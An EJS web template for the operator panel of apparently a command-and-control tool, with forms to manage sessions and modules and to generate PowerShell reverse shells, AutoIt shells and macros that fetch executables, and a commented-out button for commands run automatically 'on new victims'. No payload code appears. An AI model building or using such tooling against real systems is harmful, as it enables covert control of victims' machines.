<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>user panel</title>
    <link rel="stylesheet" href="../assets/profile.css">

</head>

<body style="background-color:rgb(37, 37, 37)">
    <style>
        ul {
            list-style-type: none;
            margin: 0;
            padding: 0;
            overflow: hidden;
            background-color: #333;
        }

        li {
            float: left;
        }

        li a {
            display: block;
            color: white;
            text-align: center;
            padding: 14px 16px;
            text-decoration: none;
        }

        li a:hover:not(.active) {
            background-color: #111;
        }

        .active {
            background-color: rgb(59, 0, 0);
        }
    </style>
    <%- include('bar.ejs'); %>

    <div class="page-content page-container" id="page-content">
        <div class="padding">
            <div class="row container d-flex justify-content-center">
                <div class="col-xl-6 col-md-12">
                    <div class="card user-card-full">
                        <div class="row m-l-0 m-r-0">
                            <div class="col-sm-4 bg-c-lite-green user-profile">
                                <div class="card-block text-center text-white">
                                    <div class="m-b-25"> <img
                                            src="/assets/fox.png"
                                        
                                            class="img-radius" height="120" alt="User-Profile-Image">
                                         </div>

                                </div>
                                <button class="button-34" role="button" onclick="open_button('list_users_div')">
                                    list users</button>
                                <button class="button-34" role="button" onclick="open_button('add_user_div')">
                                    Add user</button>
                                    
                                <button class="button-34" role="button" onclick="open_button('change_password_form')">change
                                    password</button>
                                <button class="button-34" role="button" onclick="open_button('auto_command_div')" title="handle modules">custom module
                                    </button>
                                <button class="button-34" role="button" onclick="open_button('open_autoit_div')">create autoit
                                    shell</button>
                                <!-- <button class="button-34" role="button" onclick="open_button('open_on_connection_div')" title="add commands that will run automatic on new victims">on
                                    connection command</button> -->
                                    <button class="button-34" role="button" onclick="open_button('powershell_div')" title="generate powershell reverse shell">
                                        powershell</button>
                                        <button class="button-34" role="button" onclick="open_button('macro_div')" title="generate powershell reverse shell">
                                            macro</button>
                                        
                            </div>
                            <div class="col-sm-8">
                                <div id="list_users_div" style="display:none" method="post">
                                    <br>
                                    <table>
                                        <tr>
                                            <th>username</th>
                                            <th>role</th>
                                            <th>sessions</th>

                                            <th>actions</th>

                                        </tr>
                                        <% for(var i=0; i < list_users.length; i++) { %>
                                        <tr>
                                            <td><%= list_users[i].username %></td>
                                            <td><%= list_users[i].role %></td>
                                            <% if(list_users[i].role == 'admin'){ %>
                                                <td>all</td>

                                                <% }else{ %>

                                            <td>
                                                <% if(list_users[i].sessions.length == 0){ %>
                                                    no sessions
                                                    <% } %>
                                                    <% for(var c=0; c < list_users[i].sessions.length; c++) {  %>
                                                <%=list_users[i].sessions[c]  %>,
                                                <% } %>
                                            </td>
                                            <% } %>

                                            <td><button class="button-62" role="button"
                                                onclick="delete_user('<%= list_users[i].username %>')">delete user</button>
                                                <% if(list_users[i].role == 'admin'){ %>
                                                <button class="button-62" role="button"
                                                onclick="change_role('<%= list_users[i].username %>','user')">change role to user</button>
                                                <% }else{ %>
                                                    <button class="button-62" role="button"
                                                    onclick="change_role('<%= list_users[i].username %>','admin')">change role to admin</button>
    

                                                    <% } %>
                                                    <button class="button-62" role="button" onclick="change_username('<%= list_users[i].username %>')">change
                                                        username</button>
                                                        <button class="button-62" role="button" onclick="add_session('<%= list_users[i].username %>')">add session</button>
                                                        <button class="button-62" role="button" onclick="delete_session('<%= list_users[i].username %>')">delete session</button>

                                                    </td>
                                        </tr>
                                        <% } %>
                                    </table>
                                </div>
                                <div id="macro_div" style="display:none" method="post">
                                    <br>
                                    <div class="success-msg" id="change_password_status" style="display:none">
                                        <i id="change_password_message"></i>

                                      
                                </div>
                                <input class="input-change-password" type=text id=macro_url placeholder="url of executable">
                                <button class="button-62" role="button" onclick="macro_button()">Submit</button>
                                <br>
                                    <br>
                                    <br>
                                    <textarea id="marco_textarea"  >
                                        </textarea>
                                    </div>
                                <div id="change_password_form" style="display:none" method="post">
                                    <br>
                                    <div class="success-msg" id="change_password_status" style="display:none">
                                        <i id="change_password_message"></i>

                                    </div>
                                    <input class="input-change-password" type=text id=old_password
                                        placeholder="Enter current password">
                                    <input class="input-change-password" type=text id=new_password
                                        placeholder="Enter new password"><br><br>
                                    <button class="button-62" role="button"
                                        onclick="change_password_send()">Submit</button>
                                </div>
                                <div id="add_user_div" style="display:none" method="post">
                                    <br>
                                    <div class="success-msg" id="add_user_div_status" style="display:none;color:white">
                                        <i id="add_user_message"></i>

                                    </div>
                                    <input class="input-change-password" type=text id=add_user_username
                                        placeholder="username">
                                    <input class="input-change-password" type=text id=add_user_passowrd
                                        placeholder="password"><br><br>
                                    <button class="button-62" role="button"
                                        onclick="add_user_send()">Submit</button>
                                </div>
                                <div id="auto_command_div" style="display:none" method="post">
                                    <br>

                                    <button class="button-34" role="button"
                                        onclick="open_button('auto_command_add_div')">add module</button>
                                    <button class="button-34" role="button"
                                        onclick="open_button('auto_command_list_div')">list all modules</button>
                                    <button class="button-34" role="button"
                                        onclick="open_button('auto_command_delete_div')">delete module</button>
                                        <br>
                                        <br>
                                        <br>

                                    <div class="success-msg" id="auto_command_status" style="display:none;color: white">
                                        <i id="auto_command_message"></i>

                                    </div>
                                    <div id="auto_command_add_div" style="display:none" method="post">
                                        <input class="input-change-password" type=text id="auto_command_title"
                                        placeholder="title...">
                                    <input class="input-change-password" type=text id="auto_command_des"
                                        placeholder="description...">
                                        <br> <br> <br>
                                        <textarea id="auto_command_command" class="form-control" placeholder="command.."></textarea>
                                    <button class="button-62" role="button"
                                        onclick="auto_command_send()">Submit</button>

                                    </div>
                                    <div id="auto_command_list_div" style="display:none" method="post">
                                        <table>
                                            <tr>
                                                <th>title</th>
                                                <th>description</th>
                                                <th>command</th>

                                            </tr>
                                            <% for(var i=0; i < auto_command_list.length; i++) { %>
                                            <tr>
                                                <td><%= auto_command_list[i].title %></td>
                                                <td><%= auto_command_list[i].des %></td>
                                                <td style="word-break:break-all;"><%= auto_command_list[i].command %></td>

                                            </tr>
                                            <% } %>
                                        </table>

                                    </div>
                                    <div id="auto_command_delete_div" style="display:none" method="post">
                                        <input class="input-change-password" type=text id="auto_command_delete_title"
                                        placeholder="title...">
                                        <button class="button-62" role="button"
                                        onclick="auto_command_delete_send()">Submit</button>
                                    </div>
                                </div>
                                <div id="open_autoit_div" style="display:none" method="post">
                                    <br>
                                    <div class="success-msg" id="change_password_status" style="display:none;color:white">
                                        <i id="change_password_message"></i>

                                    </div>
                                    <input class="input-change-password" type=text id=powershell_link
                                        placeholder="powershell link"><br><br>
                                    <button class="button-62" role="button" onclick="autoit_run()">Submit</button>
                                    <br>
                                    <textarea id="autoit_textarea_form" class="form-control">


                                    </textarea>
                                </div>
                                <div id="open_on_connection_div" style="display:none" method="post">
                                    <br>
                                    <br>

                                    <button class="button-34" role="button"
                                        onclick="open_button('open_on_connection_command_add_div')">add command</button>
                                    <button class="button-34" role="button"
                                        onclick="open_button('open_on_connection_command_list_div')">list all command</button>
                                    <button class="button-34" role="button"
                                        onclick="open_button('open_on_connection_command_delete_div')">delete command</button>

                                    <br>
                                    <br>
                                    <br>
                                    <div class="success-msg" id="on_connection_command_status" style="display:none;color:white;">
                                        <i id="on_connection_command_message"></i>

                                    </div>
                                    <br>
                                    <div id="open_on_connection_command_add_div" style="display:none" method="post">
                                        <input class="input-change-password" type=text
                                            id="on_connection_command_add_title" placeholder="title...">
                                        <input class="input-change-password" type=text
                                            id="on_connection_command_add_des" placeholder="description...">
                                        <input class="input-change-password" type=text
                                            id="on_connection_command_add_command" placeholder="command...">
                                        <button class="button-62" role="button"
                                            onclick="on_connection_command_add_send()">Add</button>

                                    </div>
                                    <div id="open_on_connection_command_list_div" style="display:none" method="post">
                                        
                                        <table>
                                            <tr>
                                                <th>id</th>
                                                <th>title</th>
                                                <th>description</th>
                                                <th>command</th>

                                            </tr>
                                            <% for(var i=0; i < on_connection_command_list.length; i++) { %>
                                            <tr>
                                                <td><%= on_connection_command_list[i].id %></td>
                                                <td><%= on_connection_command_list[i].title %></td>
                                                <td><%= on_connection_command_list[i].description %></td>
                                                <td><%= on_connection_command_list[i].command %></td>

                                            </tr>
                                            <% } %>
                                        </table>


                                    </div>
                                    <div id="open_on_connection_command_delete_div" style="display:none" method="post">
                                        <input class="input-change-password" type=text
                                            id="on_connection_command_delete_id" placeholder="id">
                                            <button class="button-62" role="button"
                                            onclick="on_connection_command_delete_send()">Add</button>

                                    </div>
                                </div>
                                <div id="powershell_div" style="display:none" method="post">
                                    <br>
                                     <!-- <select class="button-34" style="font-size:90%" onchange=change_powershell_type() class="input-change-password" id="powershell_type">
                                        <option  value="basic">basic</option>
                                        <option  value="full">full</option>
                                      </select>&nbsp;&nbsp;<br><br>  -->

                                    <input class="input-change-password" type=text id=powershell_ip
                                        placeholder="Host..">
                                        <input class="input-change-password" type=text id=time_sleep
                                        placeholder="Sleep time" title="sleep time between requests">
                                        <input class="input-change-password" type=text id=powershell_domain
                                        placeholder="domain" title="Enter the domain for cookies">
                                        <br><br>
                                    <button class="button-62" role="button"
                                        onclick="generate_powershell()">generate</button>
                                        <br><br>
                                        <textarea id="powershell_textarea" placeholder="http & https reverse shell" class="form-control"></textarea>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    </div>
    <script defer src="../assets/profile.js"></script>

</body>

</html>